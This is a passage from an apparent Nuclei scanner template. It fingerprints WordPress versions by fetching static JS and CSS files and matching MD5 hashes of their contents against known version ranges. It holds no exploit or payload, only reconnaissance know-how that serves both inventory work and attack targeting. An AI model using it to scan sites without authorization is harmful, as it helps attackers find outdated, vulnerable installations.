5.6 - dsl: - - "(\"b7dd42474bcd55ed030b52a40c8d62b9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-grid.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"9cc1fed809dadd16be78544cb911c7d6\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"76fe68861654653491ec8a68ceb2da4c\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"8d6c6a7438e56ab59fddb7575b40c4e4\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.19 - dsl: - - "(\"d01d7c54b7f1e87d1b3c9e7d9cd8589c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.24 - dsl: - - "(\"4cbc52e0ac47f37a70c89fc46eb69d4b\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"8a6c5d01c0ae57b622ce0a20b6de3285\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"9a70c60a2cf8bdf9508df9bb94706065\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"6fcfc76c8ca516b3b7e2e8f72e7ad2ca\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"d863d1e6f0e999c2080b1190d31cdccc\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"1fa1bd41398fffc5e65332ee0fcb4ede\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"1af7b5cd2620f279bc60b87c301079ba\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"7a93323ee3739e031e68fec070ab6d38\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"c8896b1283866646f21915c987e39997\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"f7c7b421dade9edb8932bd04ca50233a\" == md5(body))" - - type: dsl - name: 4.4.20 - 4.4.24 - dsl: - - "(\"40b80909b8b10d707d83e349bbf05cef\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"beec5f6a592c05e40a2b7e8e1b906cd8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"33ce0803e0c8d668b8574f99c21502d6\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"a03ff7aeb919c4c1af45fa1ac85a8e5c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d7de3a2d8fec560b403476fd9ed70a78\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-grid.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"d06c587bf1819bb955e35d6254f384f1\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"846bbf2e3acc156ce4d6deb772c703b3\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"7311485f4f9ecc49ce92bc6cc1c1d678\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.19 - dsl: - - "(\"1e05c8c75113e18fb3626f7ddbe07cbd\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.24 - dsl: - - "(\"3c666ce2209e20ef9e7e5c8417b59fc8\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"eb246badf364507c2f0edb0f8e38c77c\" == md5(body))" - - type: dsl - name: 4.1 - dsl: - - "(\"8d2e9573969040d7c24f7d46776962c5\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"5754139e4118cbaccd60669624da3065\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"b04ed37dbd60bc3663ada890d5af18e6\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"e9d2357fad91f0fa0122b21653d2b283\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"bc5625b3c5dec3a72a57e8456c548904\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"88f319fffd52138a412d301fcd33f88a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"b3bf3298bc66384705d5c9c1de18a24d\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"4c9e03f3ca3f12ac8c820bca5bc48b5f\" == md5(body))" - - type: dsl - name: 4.4.20 - 4.4.24 - dsl: - - "(\"feea7fbaa550658bf561a0720dd98c2e\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"05d645908e3212ce5103239db436e6f9\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"9f624a3f0011d006198f92000404dc39\" == md5(body))" - - type: dsl - name: 5.4 - 5.5.3 - dsl: - - "(\"cad76757937f5deef6ddac30e8389329\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e913c5b0e38f50d575b2d0d2240bcaba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/updates.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"a20c8b8bcd86b05c5484f17b550d85a2\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.7.19 - dsl: - - "(\"d52fdbc0a62e4bfb9cfc1c5f033c520f\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.4 - dsl: - - "(\"3e99508d7b8c46362f99dccd1dcf963c\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"c0f5ff6dd746ec2a6581fefcb2463381\" == md5(body))" - - type: dsl - name: 4.6.6 - 4.6.20 - dsl: - - "(\"cdd533d7f74e3776eed9975f9150d7ec\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.5 - dsl: - - "(\"c28e11e820bc3df934161e2b8bd534d9\" == md5(body))" - - type: dsl - name: 4.5.9 - 4.5.23 - dsl: - - "(\"35d80bf44fd2d582486dec7a23cc1880\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.8 - dsl: - - "(\"c3d379d0566156a7f2d52399b8be6282\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.9 - dsl: - - "(\"a3f43c9368858c75107e22ee643c8b9d\" == md5(body))" - - type: dsl - name: 4.4.10 - 4.4.24 - dsl: - - "(\"9f3baab230c3592d5074946bca14a80c\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.10 - dsl: - - "(\"c4da9a77a79000d837de42c577373124\" == md5(body))" - - type: dsl - name: 4.3.11 - 4.3.25 - dsl: - - "(\"0898f3c6521e958ea67134f70905f6a0\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.14 - dsl: - - "(\"e98e960b62fed4e4cdd241594d805477\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"0f5a5b69ce6a28ec4efcaf68a55c21d5\" == md5(body))" - - type: dsl - name: 4.2.15 - 4.2.29 - dsl: - - "(\"36e86bacd40a8bd856812b595564e319\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"00dc5cbe3151f0ade362e16ac8b15b9f\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a06f2c9b655df3b573f28ecfc6c1441b\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"abf0583845e397a181226d79a8dea21a\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"3691081f395094238d54950f43053808\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.7 - dsl: - - "(\"c109de1687cdbc96ee5b65fd32b10e7e\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"2d5652fcb04e5210b9bb86317b023902\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"45787a6ec1fdba7ec87920cb488113ce\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"d06dee6d89b3ca8dafa4beae31e81d8b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"113fa25e9ece18de5da152a58de9648a\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c4cbfd6b4e85c8dcff629fa3e9dbac05\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"1544137e147d6405e1d28293fcdf3ef5\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"3f2145bf3b2568ca5fef63c7159c7aa1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"045625e028cca15d1e0d5c62355f4f44\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/updates.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"0614cc34cb47d44f572435394169ccee\" == md5(body))" - - type: dsl - name: 4.7.5 - 4.7.19 - dsl: - - "(\"16789704a2a7b8a4c3c15bc8ddf57aaa\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.4 - dsl: - - "(\"480a9683a87eb320d33d5f6030ead6f6\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"7b77a3b55888f6e3c119b109b126c2c6\" == md5(body))" - - type: dsl - name: 4.6.6 - 4.6.20 - dsl: - - "(\"dc2f9ffa2e47f163b61f994d26b607dd\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.5 - dsl: - - "(\"fb342aec4e7ffd378fcd56d24e48fa55\" == md5(body))" - - type: dsl - name: 4.5.9 - 4.5.23 - dsl: - - "(\"48e77700180d3c74e87c8e2667e0a162\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.8 - dsl: - - "(\"850a250103976d39529ed57222dbcd34\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.9 - dsl: - - "(\"4b23d9c61bb3fa987575100ca32d765f\" == md5(body))" - - type: dsl - name: 4.4.10 - 4.4.24 - dsl: - - "(\"6b321157c32a1ec554f086d26fb203ee\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.10 - dsl: - - "(\"eeb4314977b1d232ebf2e2e1cd6dd957\" == md5(body))" - - type: dsl - name: 4.3.11 - 4.3.25 - dsl: - - "(\"4f059a4db81d09861ce9bd243a698423\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.14 - dsl: - - "(\"022571e949f8dad95e4d3fdab24a3d2c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"79c9c0056693f2eba1f6007ccc6fb20b\" == md5(body))" - - type: dsl - name: 4.2.15 - 4.2.29 - dsl: - - "(\"2953e98345a9b580825f4ae57b088c24\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"b1458f7c51adab170056fc1fc4c3a3ce\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"7a48c0dd8cf103ad532290fc5360e476\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"753e31324b05a56a92ee202abb3a1ba4\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"d3c97fe598e3d7b4551f653fc78d972f\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.7 - dsl: - - "(\"ad777cb3508a1846b816d600922c9c94\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"06a4eaec20bc68b7f434a5e66af39ba6\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"3fba5bcb39a5b8e0aaf169f839647ad5\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"a8bfc0c0b048264fff5bda068606648a\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"0865378b9026626b28d1da762422fded\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"275f7a92c4b1f21ee8e591094215f59e\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"327e78e6ea18ad8be485ea7a220af17c\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"fae4e9264f7c3db53c11d11b749c38f9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"fba473f85640448e5032a63c6943591d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/style-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"a81dcd1c7121e6ca6c426be55416cd81\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.1.8 - dsl: - - "(\"76adcd3fae217c56e6fc3ff97257a3b4\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"8ef50c71bf80199ba6d0a9ae9bd8ac2c\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"69e6c58d114579fea139d1eeab95a5eb\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"5f2406cc7f7dbf1cc05cfae44634c1b7\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"ccfdbc7479353ab78da216a1cb083e60\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"6cf938315537e537a7b83f86d09083ff\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"19ca41d5b33c73e19f264c028750f123\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"c136ea8e406f08b753c50416de567eb5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5d4aaf71e0edba8f95c386cf5831ecef\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/style.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"5373faf3d69572d540d9b0e4d5a9343c\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.1.8 - dsl: - - "(\"b57c9841759fb679653e42162a9218c7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"74f58e58a0247899a4917cd031bbb397\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"3fc815e03f1ef5e45b0269fb20123c31\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"3e8f8e2f37e7201633a2723931f87a29\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"ff1e4526d778743bf4370b47ff17e7c7\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"f8b102ddba5cb08cc9cca1f8761edc68\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"fc32e04b5acd4855f58d42fd344de79b\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"7cd4ab00f28c67eba2e40c822e2d78e2\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"678243a79f6d4f83e43bd1b2a6d38663\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/style-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"ebe296f540e98fd2da0bd0a097c65906\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"d853d590816c08875d95849875e42648\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"ec43179cc672af0703e82c88bb99ac8c\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"54fde402a07e30323a0a61020c057dd6\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"6c98f8fd086dfd625b8bfa2ac52a4293\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"2d58da14018a029b6726b1126e3cd132\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"10060fca872ba094902c7c2369badce7\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"49ce7010cf79420acb259b206601a1c1\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"a55b1f009c61c3cca055b596da667ca1\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"a2ba9a25208655c6dd71f0cecda2ded9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8d2ab800a215a35a3a36c951cea4a8c9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/style.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"b9d4015ad4738655273de5ab3738e09e\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"eb1a96949e0ea0d08033d3f941bf1f3e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"7a63f6bcae054a13315b6bf1d32dbcd4\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"375bd65d60ff3c8723fccc343afb1b9b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"9eeddc51b0b4a2580a959042d50f826e\" == md5(body))" - - type: dsl - name: 5.4 - dsl: - - "(\"cf20af40089bf919dc62a7abedc669e2\" == md5(body))" - - type: dsl - name: 5.4.1 - 5.4.4 - dsl: - - "(\"7d2051e6c59f3598b17877bf41637ec4\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"612b7ab9f699e968f5b3206ca16ee834\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"4c48b7dd10596a40acb74090e2230cbb\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.5.3 - dsl: - - "(\"2e7e1d1c1d4d446a1b6b63295757d859\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"27f5295ccf3ad9e0e85dcac543630288\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/comment-reply.min.js" - matchers: - - type: dsl - name: 4.4 - 5.0.11 - dsl: - - "(\"56bc2726d829207bfa802f957aac0791\" == md5(body))" - - type: dsl - name: 3.8 - 4.3.25 - dsl: - - "(\"1b1e9d1d12fcc51a151e7e0688bc695f\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"82fe85cb67dbd02e20c183e43979f217\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"500ceaa723d95be311592bd902d6823e\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"59cba75479bafeebaa4d2e8a03459599\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.2.9 - dsl: - - "(\"1d476ef0a02dea95add5d5e192d6c89a\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"0b6d9871863bb13b701f3b233cbf6609\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"b350b637bfb44baa409b39310cdea29a\" == md5(body))" - - type: dsl - name: 5.5 - dsl: - - "(\"d18b8b11a6c7f5b62e52651924ff52b8\" == md5(body))" - - type: dsl - name: 5.5.1 - dsl: - - "(\"69fcd9d534fec9b5d69fda83b5f9fdbb\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.6 - dsl: - - "(\"6d5632a96b45b575263b8ca1751babd7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/buttons.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"deafd03cf409217af66c37196f6d819e\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"247139eb61e43078fe91e3770545528e\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.3 - dsl: - - "(\"5e4b2f1d423c73e86cc870546a3843a3\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"d05ef55d8faf55ed6312a11f725ce401\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"1b5e990d2dfcf13cc8c583a92525f344\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"92489bf36e3759bf16fb38fb13a34d0e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"c7d13152f031f1cc21fbe3975c3d50ac\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"c369daa6877b943e3cfd58f57229bd61\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"5ec6f016d5581ccf2fccfaab08682af7\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"3f5a45249163f428749e8071146991f3\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"a1bde984a0c1ddd244220da833cabeb1\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"9ab3023423d067560b9c9049096e2bc3\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"aee0f4d3fa25115fde88df47238509ee\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"87ba05ef0da13f82c90d2e6cff2be01f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"662264582818feac14a7084254a5ef25\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"427b65b12d7e0b8a278d6d2d57f920b2\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"85611437313930a438c2ae6c02471891\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"030b661fe993d54e17ea592bcb19370f\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"a1a9694e3949832881055f9cc12c65c3\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.4.4 - dsl: - - "(\"7e528e095235c083a49611bdfa0cdf27\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"c4914187374db23dc287fc61050239ce\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/buttons-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"8224848470a669b2b0c314eb980ef194\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"4ad1a5e86b0ab2de7258fabc0a62b9ae\" == md5(body))" - - type: dsl - name: 4.4 - 4.7.3 - dsl: - - "(\"04203d21bcc20f3c309146e22db92332\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"bbb7feb905e67321f8f9fecdd391a30e\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"c0081aa47a02dc65a5081ddc3dca22db\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"1ee31e93b5f8424bc82b4e1e477e09e0\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"a3881585a04421965820bb64280358dc\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"64e9014d99e11a00ade285978cb2c4f8\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"2f4716ac8571b8887ab6ce14764075d9\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"435b5693ad907629c93126dcf63e28e5\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"92314c04b1ab4f91ce18aced65f218f2\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"b687c9b357655bebcb4f34d53b5402ca\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"5c33ca68783705b515c1318d9c66cdca\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"77f659ffd07e0276985e68447b3bb34b\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"1af281cfbde9fe8b5790ca9d4e7b9445\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"a290e445d2016584e513b23bf3537afe\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.4.4 - dsl: - - "(\"14e17b025e68cf83f453b0cf43b0d0c1\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"62b08b173b8361ef8443e18a062c2cf2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/buttons.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"789fe5df985c5f6d1944edc86e54f55b\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"74ac6750d8faed75774166c72f88fcbf\" == md5(body))" - - type: dsl - name: 4.4 - 4.7.3 - dsl: - - "(\"fa03516663b10fb9654af4e680ccc42b\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"650111cdcaee6c61ba5d238448345b2c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"494016bf330d1bd60723efcedbf8b3ef\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"52dc838032e91584a03c7aa660c860c7\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"6b03c4aff48876c047aa6724b93e923d\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"e82337ca2dcf3e0e43643e9912caabb3\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"47b1080fc3e5f6630771c5844dc342ec\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"da093d1bd20e5e366150d97118a39ae4\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"9047fdac8c32de54996c846d8979f186\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"24fbae22f91ed2955d47b47f5b556935\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8b2bbab9de38118eff72be3474a6f66e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"fafd866f7348fabb63d426137bbebda3\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.1 - dsl: - - "(\"899eaedb5b1be5a3cd2a6f0d76577c96\" == md5(body))" - - type: dsl - name: 5.2.2 - dsl: - - "(\"c9ecff278d15daf101f6a98d1795d65f\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"367df0e4a603dc2f2cd56fb8514e5d18\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"51e44535b6838661cb2efc5ec5aa1b47\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.4.4 - dsl: - - "(\"3db7da28d89e8eaa2ae459c5adf59a92\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"001ad841b7c73640d4b62e2b4ff532a2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-editor.min.js" - matchers: - - type: dsl - name: 4.7 - 5.2.9 - dsl: - - "(\"79cf51bae2593b7ac27b73789e43646d\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"e87a3047979eb6fca4240efe0375a64b\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.23 - dsl: - - "(\"a5595167924936ae192d5f968c90abfa\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"725a37e46661f84f85a5602e6cc33d02\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"e284f524a66d2bd63a78dc948fc74416\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"4e4658d148abeeb3d2366b951a8c65b4\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"d764b49098afb4bf721bc23426d1f432\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"bf1676ffa9bb666fca90fc26f478ba69\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.35 - dsl: - - "(\"bb3a5f53c1a46e2ae27667e82c582f79\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"40ca295704665e94d0fd46847c6ba51b\" == md5(body))" - - type: dsl - name: 3.5.2 - dsl: - - "(\"6399f3e251f5dd1604e7936c1634e199\" == md5(body))" - - type: dsl - name: 3.5.1 - dsl: - - "(\"960a0adb54a1ffa9bf62719e7896de57\" == md5(body))" - - type: dsl - name: 3.5 - dsl: - - "(\"74d81f993bcb756db962338aa45a7f37\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"b4fb4087063ff50d81bedfb48d6ec5db\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"5ff7354aed9fd67985ac5da235c8ee64\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3d02ff867901ae405f5a71300621b9df\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/theme.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"b72da1b9065e2a265d6e8ee6f51607ab\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.19 - dsl: - - "(\"ecfb55ddd7b2f7340ee501195f636afb\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"5387070f8f034c0bcfcc1355eb42e767\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"12c4f466f2fac457f7bb4ddb5eba3be9\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - 